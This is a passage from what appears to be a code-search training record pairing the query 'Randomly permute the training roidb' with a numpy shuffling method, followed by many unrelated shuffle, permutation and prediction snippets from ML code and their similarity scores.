time_start = time.time()\n # works only with 1 batch\n detection_model.convert_original_predictions(\n shift_amount=shift_amount,\n full_shape=full_shape,\n )\n object_prediction_list: List[ObjectPrediction] = detection_model.object_prediction_list\n # filter out predictions with lower score\n filtered_object_prediction_list = [\n object_prediction\n for object_prediction in object_prediction_list\n if object_prediction.score.value > detection_model.confidence_threshold\n ]\n # postprocess matching predictions\n if postprocess is not None:\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n else:\n # init match merge instances\n postprocess = UnionMergePostprocess(match_threshold=0.9, match_metric=\"IOS\", class_agnostic=True)\n # postprocess matching predictions\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n\n time_end = time.time() - time_start\n durations_in_seconds[\"postprocess\"] = time_end\n\n if verbose == 1:\n print(\n \"Prediction performed in\",\n durations_in_seconds[\"prediction\"],\n \"seconds.\",\n )\n\n return PredictionResult(\n image=image, object_prediction_list=filtered_object_prediction_list, durations_in_seconds=durations_in_seconds\n )", "def predict(self):\n raise NotImplementedError", "def predict_only(self):", "def predict():\n\n\n json_payload = request.json\n #LOG.info(f\"JSON payload: %s\" %json_payload)\n inference_payload = pd.DataFrame(json_payload)\n #LOG.info(\"inference payload DataFrame: %s\" %inference_payload)\n scaled_payload = scale(inference_payload)\n prediction = list(clf.predict(scaled_payload))\n return jsonify({'prediction': prediction})", "def main(image, model_dir):\n model_file, signature = get_model_and_sig(model_dir)\n interpreter = load_model(model_dir + model_file)\n prediction = get_prediction(image, interpreter, signature)\n # get list of confidences from prediction\n confidences = list(prediction.values())[0]\n # get the label name for the predicted class\n labels = signature.get(\"classes\").get(\"Label\")\n max_confidence = max(confidences)\n prediction[\"Prediction\"] = labels[confidences.index(max_confidence)]\n return prediction", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n predict = self.model.predict(x)\n return predict", "def predict(self, image, visualization=False):\n image = cv2.resize(self._preprocess(image), (224, 224))\n\n start_time = millis_time()\n predictions = self.model.predict(np.array([image]))[0]\n print(\"Prediction time: {}ms\".format(millis_time() - start_time))\n\n predictions = predictions.reshape((image.shape[0], image.shape[1], 2))\n\n if visualization:\n vis = view_seg_map(image, predictions.argmax(axis=2), color=(0, 1, 0)) * 255\n\n return predictions, vis\n\n return predictions", "def get_features(model, image_filename, images_folder_path):\n\n img = image.load_img(images_folder_path + image_filename,\n target_size=(224, 224))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n return model.predict(x).reshape(-1)", "def predict_on_image(image, model, threshold=0.3):\n model.eval()\n _, h, w = image.shape\n image = image[None, ...] 
# batch_size of 1\n with torch.no_grad():\n output = model(image)\n preds, maxvals = get_max_preds(output.cpu().numpy())\n preds, maxvals = preds[0], maxvals[0] # because batch_size of 1\n # Times by 4, because output map resolution is decreased by\n # a factor of with respect to input image\n preds = preds * 4\n\n for i, maxval in enumerate(maxvals):\n if maxval < threshold:\n preds[i] = [0, 0]\n\n return preds.tolist()", "def predict(cls, input):\n clf = cls.get_model()\n return clf.predict(input)", "def predict(self, inputs):\n return self.model.predict(inputs)", "def predict(self, x):\n if self.training:\n self.eval()\n\n with torch.no_grad():\n output = self.forward(x)\n\n if self.classes > 1:\n probs = torch.softmax(output, dim=1)\n else:\n probs = torch.sigmoid(output)\n\n probs = probs.squeeze(0)\n tf = transforms.Compose(\n [\n transforms.ToPILImage(),\n transforms.Resize(x.size[1]),\n transforms.ToTensor()\n ]\n )\n full_mask = tf(probs.cpu()) \n\n return full_mask", "def predict(self, src): # real signature unknown; restored from __doc__\n pass", "def predict_from(self, inputs, to_layers):", "def predict(self):\n self.kf.predict()\n self.nb_kf_pred += 1\n if self.time_since_update > 0:\n self.hit_streak = 0\n self.time_since_update += 1\n self.history.append(self.kf.x[:2].reshape(-1))\n return self.history[-1]", "def predict_for_frame(model, cv_img):\n faces = crop_faces([cv_img], only_one=False, using_bundled_library=True)[0]\n\n if len(faces) == 0:\n return []\n\n pre_processing = transforms.Compose([\n transforms.Grayscale(num_output_channels=1),\n transforms.Resize(tuple(config[\"resolution\"])),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5], std=[0.5]),\n ])\n\n pre_processed_faces = []\n faces_coords = []\n for face in faces:\n (x, y, w, h) = face\n face_cv = crop_cv_img(cv_img, x, y, w, h)\n face_pil = pre_processing(pl.Image.fromarray(face_cv))\n pre_processed_faces.append(face_pil)\n faces_coords.append((x, y, w, h))\n\n x = torch.stack(pre_processed_faces)\n predictions = torch.nn.Softmax(dim=1)(model.forward(x))\n\n output = []\n\n for prediction, coords in zip(predictions, faces_coords):\n output.append({\n \"prediction\": prediction,\n \"position\": coords\n })\n\n return output", "def predict(self, x, **kwargs):\n kwargs = self.filter_sk_params(Sequential.predict, kwargs)\n return np.squeeze(self.model.predict(x, **kwargs))", "def getEncode(self, img):\n img_ = self.preprocess(img)\n fv = self.model_.predict(img_)\n fv = fv.reshape(-1, 1)\n return fv", "def image_model_predict(input_ms_image_filename, input_pan_image_filename, pan_img_height_size, pan_img_width_size, \r\n fitted_model, write, output_filename):\r\n \r\n with rasterio.open(input_ms_image_filename) as f:\r\n metadata = f.profile\r\n ms_img = np.transpose(f.read(tuple(np.arange(metadata['count']) + 1)), [1, 2, 0])\r\n \r\n with rasterio.open(input_pan_image_filename) as g:\r\n metadata_pan = g.profile\r\n pan_img = g.read(1)\r\n \r\n pan_img = np.expand_dims(pan_img, axis = 2)\r\n \r\n ms_to_pan_ratio = metadata['transform'][0] / metadata_pan['transform'][0]\r\n \r\n class_layer = np.zeros((pan_img.shape[0], pan_img.shape[1]))\r\n \r\n img_pan_holder = []\r\n img_ms_holder = []\r\n \r\n for i in range(0, pan_img.shape[0] - pan_img_height_size, int(ms_to_pan_ratio)):\r\n for j in range(0, pan_img.shape[1] - pan_img_width_size, int(ms_to_pan_ratio)):\r\n img_pan_iter = pan_img[i : i + pan_img_height_size, j : j + pan_img_width_size, 0]\r\n img_pan_holder.append(img_pan_iter)\r\n \r\n for i 
in range(0, int(ms_img.shape[0] - (pan_img_height_size / ms_to_pan_ratio)), int(ms_to_pan_ratio)):\r\n for j in range(0, int(pan_img.shape[1] - (pan_img_width_size / ms_to_pan_ratio)), int(ms_to_pan_ratio)):\r\n img_ms_iter = ms_img[i : int(i + (pan_img_height_size / ms_to_pan_ratio)), \r\n j : int(j + (pan_img_width_size / ms_to_pan_ratio)), \r\n 0 : metadata['count']]\r\n img_ms_holder.append(img_ms_iter)\r\n \r\n img_pan_array = np.concatenate(img_pan_holder, axis = 0)\r\n img_ms_array = np.concatenate(img_ms_holder, axis = 0)\r\n \r\n pred_array = np.argmax(fitted_model.predict([img_ms_array, img_pan_array]), axis = 1)\r\n \r\n n = 0 \r\n for i in range(int(pan_img_height_size / 2), pan_img.shape[0] - int(pan_img_height_size / 2), int(ms_to_pan_ratio)):\r\n for j in range(int(pan_img_width_size / 2), pan_img.shape[1] - int(pan_img_width_size / 2), int(ms_to_pan_ratio)):\r\n class_layer[i, j] = pred_array[n]\r\n n += 1\r\n \r\n if write:\r\n with rasterio.open(output_filename, 'w', **metadata_pan) as dst:\r\n dst.write(class_layer)\r\n \r\n return class_layer", "def predict(self, X):", "def predict(self, X):" ]
[ "0.8407046", "0.82272613", "0.8150348", "0.8089915", "0.804863", "0.804863", "0.78832704", "0.7876628", "0.7739453", "0.7739021", "0.77017534", "0.769704", "0.76113904", "0.7572362", "0.75003004", "0.7484886", "0.74482", "0.7415542", "0.7312185", "0.72863543", "0.728227", "0.7186036", "0.7183744", "0.71819735", "0.71651584", "0.7157286", "0.7147795", "0.7130362", "0.71273696", "0.7103107", "0.70952296", "0.70930076", "0.707336", "0.70166326", "0.70130247", "0.70019895", "0.69976425", "0.6985232", "0.6978961", "0.6975404", "0.695443", "0.6951583", "0.6914942", "0.69068956", "0.68974113", "0.68873835", "0.68782645", "0.6872228", "0.6857078", "0.685447", "0.68439883", "0.6822967", "0.6816181", "0.68135", "0.68127185", "0.6806271", "0.6805537", "0.6799206", "0.6783108", "0.6782456", "0.6776867", "0.67731166", "0.67688274", "0.6761066", "0.67569786", "0.67566484", "0.67508674", "0.6744044", "0.67389715", "0.67289984", "0.6724189", "0.67202467", "0.6715214", "0.669948", "0.66975", "0.6695025", "0.66850877", "0.6683235", "0.66819316", "0.6681296", "0.6676647", "0.6667517", "0.6663395", "0.6661073", "0.6655027", "0.66548413", "0.6654551", "0.6644024", "0.6643107", "0.66396534", "0.66310424", "0.66296244", "0.66175735", "0.6613507", "0.66099685", "0.660587", "0.66036975", "0.6603108", "0.65988654", "0.65988654" ]
0.7862426
8
Randomly permute the training roidb.
def _shuffle_roidb_idx(self): self.perm = np.random.permutation(np.arange(self.num_images)) self.cur = 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _random_permutation(self):\n self.train_permutation = numpy.random.permutation(range(len(self.train_list)))", "def shuffle(self, random_state=None): \n if random_state is None:\n random_state = self.random_state\n perm_ids = random_state.permutation(self.n_examples)\n self.u = self.u[perm_ids]\n self.v = self.v[perm_ids]\n self.rating = self.rating[perm_ids]", "def shuffle(self):\n self.train_nodes = np.random.permutation(self.train_nodes)\n self.batch_num = 0", "def shuffle(self):\n self.train_nodes = np.random.permutation(self.train_nodes)\n self.batch_num = 0", "def _shuffle_roidb_inds(self):\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\n self._cur = 0", "def permute(self):\n raise NotImplementedError()", "def _shuffle_roidb_inds(self):\n ## 设置cur来指向现在访问的长度\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\n self._cur = 0", "def scramble(self):\n\t\tfor key in self.activations.keys():\n\t\t\tself.weights[key] = r.randint(0, 1)", "def scramble(self):\n\t\tfor key in self.activations.keys():\n\t\t\tself.weights[key] = r.randint(0, 1)", "def permutation(self):\n perm = np.random.permutation(self.n_samples)\n self.data = self.data.iloc[perm]\n self.labels = self.labels.iloc[perm]\n self.labels_onehot = self.labels_onehot.iloc[perm]\n self.df_perm = self.df_perm.iloc[perm]", "def shuffle(self):\n self.train_edges = np.random.permutation(self.train_edges)\n self.nodes = np.random.permutation(self.nodes)\n self.batch_num = 0", "def shuffle(self):\n perm = self.rng.permutation(self.inputs.shape[0])\n self._current_order = self._current_order[perm]\n self.inputs = self.inputs[perm]\n self.targets = self.targets[perm]\n self.target_ids = self.target_ids[perm]", "def shuffle_train(self):\r\n if self.data_container.task == 'Classify':\r\n id_train_list=[]\r\n for i in self.idx_train_list:\r\n id_train_list.append(self._random_state.choice(i,self.train_parms[0]))\r\n for j in self._random_state.choice(self.unique_value, self.train_parms[1]):\r\n id_train_list.append(self._random_state.choice(self.idx_train_list[j],1))\r\n self.idx['train'] = np.concatenate(id_train_list, axis=0)\r\n \r\n self.idx['train'] = self._random_state.permutation(self.idx['train'])", "def shuffle(self):\n perm = self.rng.permutation(self.inputs.shape[0])\n self._current_order = self._current_order[perm]\n self.inputs = self.inputs[perm]\n self.targets = self.targets[perm]", "def _shuffle(self, r, idx_to_shuffle = None):\n n_features = r.shape[0]\n n_trials = r.shape[1]\n r_sh = r\n if idx_to_shuffle is None:\n idx_to_shuffle = range(n_features)\n for i in range(n_features):\n if i in idx_to_shuffle:\n r_sh[i,:] = r[i,random.permutation(range(n_trials))]\n return r_sh", "def mute(individual):\n mutatePt=random.randint(0,len(individual)-1)\n if mutatePt==0:\n individual[mutatePt]=random.uniform(kNN.features_min[0], kNN.features_max[0])\n elif mutatePt==2:\n individual[mutatePt]=random.uniform(kNN.features_min[1], kNN.features_max[1])\n elif mutatePt==3:\n individual[mutatePt]=random.uniform(kNN.features_min[2], kNN.features_max[2])\n elif mutatePt==4:\n individual[mutatePt]=random.uniform(kNN.features_min[3], kNN.features_max[3])\n elif mutatePt==5:\n individual[mutatePt]=random.uniform(kNN.features_min[4], kNN.features_max[4])\n\n return individual,", "def shuffle(self):\n self.x['train'], self.y['train'] = self._shuffle(\n self.x['train'],\n self.y['train']\n )", "def shuffle_opacities(mutated_genome):\n mutated_genome", "def reset(self):\n newPerm = 
randomUtils.randomPermutation(self.xArray.tolist(),self)\n self.pot = np.asarray(newPerm)", "def shuffle(self, random_seed: int = 0):\n # shuffle feature model clauses (used for div. promotion)\n random.seed(random_seed)\n clauses_ = []\n for clause in self.clauses_raw:\n clause_ = random.sample(clause, len(clause))\n clauses_.append(clause_)\n clauses = random.sample(clauses_, len(clauses_))\n \n self.clauses, self.target = FeatureModel.__convert_dimacs_to_bitvec(clauses, len(self.feature_dict))", "def shuffle(self):\n self.edges = np.random.permutation(self.edges)\n self.batch_num = 0", "def randomize(data):\r\n permutation = np.random.permutation(data.shape[0])\r\n shuffled_data = data[permutation, :]\r\n # shuffled_y = y[permutation]\r\n return shuffled_data", "def __permute(l,opts):\n MAX_RAND_SIZE = 2080 \n if (len(l)/3 < MAX_RAND_SIZE): \n rd.shuffle(l)\n else:\n sys.stderr.write(\\\n\t\t\"{}:{}: Valid Random Permutation Range Exceeded.\"\\\n\t\t.format(opts.progname,permute.__name__))\n opts.perror+=1", "def permute_network_tuple(self):\n\n net_tuple = self.read_nodestate(0)\n cs_prng = random.SystemRandom()\n\n network_list = list(net_tuple)\n cs_prng.shuffle(network_list)\n new_network_tuple = tuple(network_list)\n\n self.write_nodestate(nodeState, 0, new_network_tuple)", "def random():\n np.random.seed(1939)", "def randomize(self):\n self.weights = np.random.rand(*self.weights.shape) - 0.5", "def shuffle_data(self):\n images = list(self.train_images)\n labels = list(self.train_labels)\n self.train_images = []\n self.train_labels = []\n\n # create list of permutated index and shuffle data accoding to list\n idx = np.random.permutation(len(labels))\n for i in idx:\n self.train_images.append(images[i])\n self.train_labels.append(labels[i])", "def random():\n np.random.seed(0)", "def clone_rand(self):", "def shuffle(self):\n\t\t\trandom.seed(231)\n\t\t\trandom.shuffle(self.Ind)\n\t\t\tself.Ind = self.Ind[:int(len(self.Ind)/5)*5].reshape((self.cv_iters, -1))\n\t\t\t#index of valication set\n\t\t\tself.CVindex = 1\n\t\t\tself.Testindex = 0", "def shuffle(self, random_state=None):\n if random_state is not None:\n self.df = self.df.sample(frac=1, random_state=random_state)\n else:\n self.df = self.df.sample(frac=1)", "def test_permutation(self):\r\n rng_R = random_state_type()\r\n post_r, out = permutation(rng_R, size=(9,), n=6)\r\n print 'OUT NDIM', out.ndim\r\n f = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r, mutable=True)],\r\n [out], accept_inplace=True)\r\n\r\n numpy_rng = numpy.random.RandomState(utt.fetch_seed())\r\n # Check over two calls to see if the random state is correctly updated.\r\n # numpy_rng.permutation outputs one vector at a time,\r\n # so we call it iteratively to generate all the samples.\r\n val0 = f()\r\n val1 = f()\r\n numpy_val0 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n numpy_val1 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n print val0\r\n print numpy_val0\r\n print val1\r\n print numpy_val1\r\n self.assertTrue(numpy.all(val0 == numpy_val0))\r\n self.assertTrue(numpy.all(val1 == numpy_val1))", "def shuffle_1d_nb(a, seed=None):\n if seed is not None:\n np.random.seed(seed)\n return np.random.permutation(a)", "def experiment4():\n np.random.seed()\n state['result'] = np.random.rand(1)", "def _mutate(self,arr,p_mut):\n mut = np.random.random_sample(arr.shape)<p_mut\n no_mut = ~mut\n mut_val = 
np.random.uniform(low=self.minval,high=self.maxval,size=arr.shape)\n return (no_mut*arr) + (mut*mut_val)", "def totem_random():\n random_head()\n random_head()\n random_head()", "def permutation(random_state, size=None, n=1, ndim=None, dtype='int64'):\r\n ndim, size, bcast = _infer_ndim_bcast(ndim, size)\r\n #print \"NDIM\", ndim, size\r\n op = RandomFunction(permutation_helper,\r\n tensor.TensorType(dtype=dtype, broadcastable=bcast + (False,)),\r\n ndim_added=1)\r\n return op(random_state, size, n)", "def bit_flip_mutation(random, candidate, args):\r\n rate = args.setdefault('mutation_rate', 0.1)\r\n mutant = copy.copy(candidate)\r\n if len(mutant) == len([x for x in mutant if x in [0, 1]]):\r\n for i, m in enumerate(mutant):\r\n if random.random() < rate:\r\n mutant[i] = (m + 1) % 2\r\n return mutant", "def shuffle(self):\n for i in range(10):\n random.shuffle(self.set)", "def shuffle(self):\n new_X = np.empty(self.X_data.shape, dtype=self.X_data.dtype)\n new_Y = np.empty(self.Y_data.shape, dtype=self.Y_data.dtype)\n perm = np.random.permutation(self.X_data.shape[0])\n for old_idx, new_idx in enumerate(perm):\n new_X[new_idx] = self.X_data[old_idx]\n new_Y[new_idx] = self.Y_data[old_idx]\n self.X_data = new_X\n self.Y_data = new_Y", "def shuffle(lol, seed):\n for l in lol:\n random.seed(seed)\n random.shuffle(l)", "def shuffle(self):\n x = len(self.org)\n result = self.org[:]\n var = x\n for i in range(x):\n id = random.randrange(0, var)\n result[id], result[var - 1] = result[var - 1], result[id]\n var -= 1\n\n return result", "def pepper(self, prob=0.08):\n h, w, c = self.img.shape\n for i in range(h):\n for j in range(w):\n if random() < prob:\n self.img[i, j] = 0\n\n self.edits.append(f\"pepper:{prob}\")\n return self", "def permute_table(dtable):\n shuffle_field(dtable, 'gene')\n shuffle_field(dtable, 'sample')\n shuffle_field(dtable, 'Normalized')\n if 'Filler' in dtable:\n del dtable['Filler']", "def shuffle_pass(cls, p):\n password = ''.join(random.sample(p, len(p)))\n print(f\"Generated password is:{password}\")\n pyperclip.copy(password)\n print(f\"Your {len(password)} Digit Password is copied to clipboard!\")", "def make_repeatable():\n random.seed(1234)\n np.random.seed(1234)", "def random_rotate(self):\r\n rotation = rand.randrange(0, 4, 1) # 0, 1, 2, 3\r\n flip = rand.randrange(0, 2, 1) # 0, 1\r\n new_seed = copy.deepcopy(self)\r\n # rotate by 90 degrees * rotation (0, 90, 180 270)\r\n new_seed.cells = np.rot90(new_seed.cells, rotation) \r\n if (flip == 1):\r\n # flip upside down\r\n new_seed.cells = np.flipud(new_seed.cells)\r\n new_seed.xspan = new_seed.cells.shape[0]\r\n new_seed.yspan = new_seed.cells.shape[1]\r\n return new_seed", "def random_reset_mutation(random, candidate, args):\r\n bounder = args['_ec'].bounder\r\n try:\r\n values = bounder.values\r\n except AttributeError:\r\n values = None\r\n if values is not None:\r\n rate = args.setdefault('mutation_rate', 0.1)\r\n mutant = copy.copy(candidate)\r\n for i, m in enumerate(mutant):\r\n if random.random() < rate:\r\n mutant[i] = random.choice(values)\r\n return mutant\r\n else:\r\n return candidate", "def test_random_permute_inverse_changes_group(self):\n # reproducible arbitrariness\n np.random.seed(232)\n\n nchan = 3\n nsteps = 20\n rho = 1.0/4\n target = np.random.randn(nchan, nsteps)\n\n controller = LinearController(self.G, target, tau=None)\n\n controller.set_random_permute_inverse(rho)\n self.assertIsNotNone(controller.permute_inverse)\n\n n_per_group = self.N/nchan\n groups0 = 
np.arange(self.N)/n_per_group\n groups1 = controller.permute_inverse/n_per_group\n\n # check that the right fraction of assignments are kept intact\n self.assertEqual(np.sum(groups0 != groups1), rho*self.N)", "def calc_granger_shuffle(self):\n if not hasattr(self, 'input_data'):\n self.preprocess_and_check_stationarity()\n temp_series = [np.stack([np.random.permutation(x)\n for x in self.input_data.T]).T\n for i in trange(self.n_shuffles)]\n\n outs_temp = parallelize(self.calc_granger, temp_series, n_jobs=30)\n outs_temp = [x[0] for x in outs_temp]\n self.shuffle_outs = np.array(outs_temp)", "def shuffle_nb(a, seed=None):\n if seed is not None:\n np.random.seed(seed)\n out = np.empty_like(a, dtype=a.dtype)\n\n for col in range(a.shape[1]):\n out[:, col] = np.random.permutation(a[:, col])\n return out", "def shuffle_T(self):\n np.random.shuffle(self.T)", "def shuffle_points(mutated_genome,index):\n random.shuffle(mutated_genome[index][2])", "def Randomize(seed=None):\n random.seed()", "def _shuffle_roidb_inds(self):\r\n if True: #cfg.TRAIN.ASPECT_GROUPING:\r\n widths = np.array([r['width'] for r in self._roidb])\r\n heights = np.array([r['height'] for r in self._roidb])\r\n horz = (widths >= heights)\r\n vert = np.logical_not(horz)\r\n horz_inds = np.where(horz)[0]\r\n vert_inds = np.where(vert)[0]\r\n\r\n horz_inds = np.random.permutation(horz_inds)\r\n vert_inds = np.random.permutation(vert_inds)\r\n mb = 2 #cfg.TRAIN.IMS_PER_BATCH\r\n horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]\r\n vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]\r\n inds = np.hstack((horz_inds, vert_inds))\r\n\r\n inds = np.reshape(inds, (-1, mb))\r\n row_perm = np.random.permutation(np.arange(inds.shape[0]))\r\n inds = np.reshape(inds[row_perm, :], (-1, ))\r\n self._perm = inds\r\n else:\r\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\r\n self._perm = deque(self._perm)\r\n self._cur = 0", "def sample_bernoulli(self, probabilities):\n return tf.nn.relu(tf.sign(probabilities - tf.random.uniform(probabilities.shape)))", "def randomize(self):\n #first take care of all parameters (from N(0,1))\n x = self._get_params_transformed()\n x = np.random.randn(x.size)\n self._set_params_transformed(x)\n #now draw from prior where possible\n x = self._get_params()\n [np.put(x,i,p.rvs(1)) for i,p in enumerate(self.priors) if not p is None]\n self._set_params(x)\n self._set_params_transformed(self._get_params_transformed())#makes sure all of the tied parameters get the same init (since there's only one prior object...)", "def shuffle(self):\n sampling_index = np.random.randint(0, self.total_negative_samples, self.neg_paths_per_epoch)\n self.neg_paths_sampled = np.reshape(self.neg_paths[:, sampling_index , :], (-1, self.max_length))\n self.neg_paths_words_sampled = np.reshape(self.neg_paths_words[:, sampling_index, :], (-1, self.max_length))\n if self.schema != 'default':\n self.neg_paths_rel1_sampled = np.reshape(self.neg_paths_rel1[:, sampling_index, :],(-1, self.max_length))\n self.neg_paths_rel2_sampled = np.reshape(self.neg_paths_rel2[:, sampling_index, :],(-1, self.max_length))\n self.neg_paths_rel3_sampled = np.reshape(self.neg_paths_rel3[:, sampling_index, :],(-1, self.max_length))\n self.neg_paths_rel4_sampled = np.reshape(self.neg_paths_rel4[:, sampling_index, :],(-1, self.max_length))\n\n self.questions_shuffled, self.questions_dep_shuffled, self.questions_dep_mask_shuffled,\\\n self.pos_paths_shuffled, \\\n self.pos_paths_rel1_shuffled,self.pos_paths_rel2_shuffled, self.pos_paths_rel3_shuffled, 
self.pos_paths_rel4_shuffled, \\\n self.neg_paths_shuffled, \\\n self.neg_paths_rel1_shuffled, self.neg_paths_rel2_shuffled,self.neg_paths_rel3_shuffled,self.neg_paths_rel4_shuffled,\\\n self.pos_paths_words_shuffled, self.neg_paths_words_shuffled = \\\n shuffle(self.questions, self.questions_dep, self.questions_dep_mask,\n self.pos_paths,\n self.pos_paths_rel1, self.pos_paths_rel2,self.pos_paths_rel3,self.pos_paths_rel4,\n self.neg_paths_sampled,\n self.neg_paths_rel1_sampled, self.neg_paths_rel2_sampled, self.neg_paths_rel3_sampled, self.neg_paths_rel4_sampled,\n self.pos_paths_words, self.neg_paths_words_sampled)\n else:\n self.questions_shuffled, self.questions_dep_shuffled, self.questions_dep_mask_shuffled,\\\n self.pos_paths_shuffled, self.neg_paths_shuffled,self.pos_paths_words_shuffled, self.neg_paths_words_shuffled = \\\n shuffle(self.questions, self.questions_dep, self.questions_dep_mask,\n self.pos_paths, self.neg_paths_sampled,self.pos_paths_words,self.neg_paths_words_sampled)", "def shuffle(self) -> NoReturn:\n for edge_type in self.edge_types:\n for edge_class in range(self.edge_types[edge_type]):\n self.train_edges[edge_type][edge_class] = np.random.permutation(\n self.train_edges[edge_type][edge_class])\n\n self.freebatch_edge_types = {edge_type: list(range(edge_class))\n for edge_type, edge_class in self.edge_types.items()}\n self.batch_num = {edge_type: [0] * edge_class for edge_type, edge_class in\n self.edge_types.items()}\n self.took_all_edges = {edge_type: False for edge_type in self.edge_types}\n self.iter = 0", "def rand(self):\n raise NotImplementedError", "def pre_randomize(self, seed):\n super(ReseedingRandomizer, self).pre_randomize(seed)\n self.seed(seed=seed)", "def shuffle(L):\n return [L[i] for i in permutation(len(L))]", "def reset_random_prob(self):\n cache_len = 100000\n self.random_prob_cache = np.random.random(size=(cache_len,))\n self.random_prob_ptr = cache_len - 1", "def random_permutation(iterable, r = None):\n pool = tuple(iterable)\n r = len(pool) if r is None else r\n return tuple(random.sample(pool, r))", "def shuffle_chromosomes(mutated_genome):\n random.shuffle(mutated_genome)", "def PermutationTest(self):\n # U = union of B and T\n union_sample = np.concatenate((self.x_benchmark, self.x_trial), axis=0)\n n_samples = self.NB + self.NT\n \n # Initialize array of test statistic values\n self.TS_tilde = np.zeros(self.n_perm, dtype=np.float)\n \n count=0\n print(\"Running {:d} Permutations... 0%\".format(self.n_perm))\n \n # loop over different samplings\n for i in range(self.n_perm):\n \n # Print progress\n progress = int(round(((i+1)/self.n_perm)*100,0))\n progress_list = [25, 50, 75, 100]\n if count < len(progress_list) and progress == progress_list[count]:\n count+=1\n print(\"Running {:d} Permutations... 
{:d}%\".format(self.n_perm, progress))\n \n # Random permutations of U (sampling without replacement)\n x_resampled = shuffle(union_sample)\n # Assign first NB elements to Benchmark\n B_resampled = x_resampled[:self.NB]\n # Assign remaning NT elements to Trial\n T_resampled = x_resampled[self.NB:]\n \n # Compute the test statistic\n self.TS_tilde[i] = self.TestStatistic(B_resampled, T_resampled)", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.permutation((20,), 10))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def permutation(a):\n rs = _generator.get_random_state()\n return rs.permutation(a)", "def shuffle(self, inp: Tensor):\n _seed = self._seed() if callable(self._seed) else self._seed\n inp._reset(_shuffle(inp=inp, seed=_seed, handle=self._handle))", "def scramble_mutation(random, candidate, args):\r\n rate = args.setdefault('mutation_rate', 0.1)\r\n if random.random() < rate:\r\n size = len(candidate)\r\n p = random.randint(0, size-1)\r\n q = random.randint(0, size-1)\r\n p, q = min(p, q), max(p, q)\r\n s = candidate[p:q+1]\r\n random.shuffle(s)\r\n return candidate[:p] + s[::-1] + candidate[q+1:]\r\n else:\r\n return candidate", "def update_random_state(self):\n self.random_state = RandomState()", "def random_state(N, p):\n m = int(N * p)\n s = np.concatenate([np.ones(m), np.ones(N-m) * -1]).astype(np.int8)\n np.random.shuffle(s)\n return s", "def shuffle(self):\n self.np_random.shuffle(self.deck)", "def __init__(self, roidb, num_classes):\n self._roidb = roidb\n self._num_classes = num_classes\n self._shuffle_roidb_inds()", "def __init__(self, roidb, num_classes):\n self._roidb = roidb\n self._num_classes = num_classes\n self._shuffle_roidb_inds()", "def reset_rf_samples():\n forest._generate_sample_indices = (lambda rs, n_samples:\n forest.check_random_state(rs).randint(0, n_samples, n_samples))", "def shuffle(self): \n for x in range(12):\n self.right(primary=-60, counter=0)\n time.sleep(.1)\n self.left(primary=-60, counter=0)\n time.sleep(.1)\n self.stop()", "def ScrambleMutation(item):\n item=copy.deepcopy(item)\n countryNo = len(item)\n [start,end] = sorted(random.sample(range(1,countryNo+1),2))\n shuffle_slice(item,start,end)\n return item", "def shuffle_question(self):\n r = random.SystemRandom()\n r.shuffle(self.question_list)", "def shuffle(self):\n for edge_type in self.edge_types:\n for k in range(self.edge_types[edge_type]):\n self.train_edges[edge_type][k] = np.random.permutation(self.train_edges[edge_type][k])\n self.batch_num[self.edge_type2idx[edge_type[0], edge_type[1], k]] = 0\n self.current_edge_type_idx = 0\n self.freebatch_edge_types = list(range(self.num_edge_types))\n self.freebatch_edge_types.remove(self.edge_type2idx[0, 0, 0])\n self.freebatch_edge_types.remove(self.edge_type2idx[0, 1, 0])\n self.freebatch_edge_types.remove(self.edge_type2idx[1, 0, 0])\n self.iter = 0", "def random_weight_init(_p: 
Perceptron):\n\n _p.weights = [rd.choice([1-rd.random(), -1+rd.random()]) for _ in range(_p.input_size)]", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.permutation((20,), 10), updates=random.updates())\r\n\r\n fn_val0 = fn()\r\n fn_val1 = fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def trainSet(self):\r\n self.currIdx = 0\r\n random.shuffle(self.trainSamples)\r\n self.samples = self.trainSamples[:self.numTrainSamplesPerEpoch]", "def _sample_lam(self, cur_y, cur_z):\n old_loglik = self._loglik(cur_y, cur_z)\n old_lam = self.lam\n \n # modify the feature ownership matrix\n self.lam = np.random.beta(1,1)\n new_loglik = self._loglik(cur_y, cur_z)\n move_prob = 1 / (1 + np.exp(old_loglik - new_loglik));\n if random.random() < move_prob:\n pass\n else:\n self.lam = old_lam", "def 